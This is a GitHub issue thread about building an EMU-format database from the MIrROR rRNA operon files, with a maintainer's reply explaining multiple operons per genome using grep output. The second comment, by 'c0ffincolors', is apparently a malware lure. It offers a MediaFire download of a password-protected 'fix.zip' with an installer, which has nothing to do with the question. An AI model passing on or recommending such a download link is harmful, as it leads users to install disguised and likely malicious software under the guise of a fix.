### ISSUE TITLE
Adapt database to use EMU

### ISSUE THREAD

**Issue by ayamakawa** [seoldh/MIrROR#1]
I wanna test the MIrROR database using the EMU estimator (https://github.com/treangenlab/emu). 

For that, I need to build the database with the EMU format. I need to use the tsv and the fasta file, plus a file with two columns, the first with the sequence headers and the second with the corresponding tax_id. 

For that I extracted the sequence headers and combined with the corresponding accession and operon number. So, with the MIrROR_DB_r01.fa, there were 97781 sequences, as expected, but the MIrROR_DB_r01.tsv file has only 43653 entries. And when I combine, I ended up with 31530 entries.

Is this right? I was expecting the tsv/taxo file would have each of the 97781 sequences respective taxonomic. 

Thank you!

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seoldh** [comment]
Hi, thank you for your question.

Each genome can contain multiple rRNA operon sequences with intragenomic variation.

For example, GCA_000362965.1 has 6 rRNA operon sequences, as indicated in the second column of the TSV file.
```
grep ">" MIrROR_DB_r01.fa | head -n 7
>GCA_000556705.1_KK013789.1_4167bp_1st operon
>GCA_000362965.1_KB822062.1_4133bp_1st operon
>GCA_000362965.1_KB822062.1_4167bp_2nd operon
>GCA_000362965.1_KB822062.1_4195bp_3rd operon
>GCA_000362965.1_KB822062.1_4300bp_4th operon
>GCA_000362965.1_KB822062.1_4300bp_5th operon
>GCA_000362965.1_KB822062.1_4304bp_6th operon

grep "GCA_000362965.1" MIrROR_DB_r01.tsv
GCA_000362965.1   6   Firmicutes   Bacilli   Staphylococcales   Staphylococcaceae   Staphylococcus   Staphylococcus_aureus
```
Could you please clarify how you arrived at 31,530 entries? Please consider the information provided above when constructing the database for EMU.

P.S. The MIrROR2 DB, based on GTDB release 220, will be released soon.
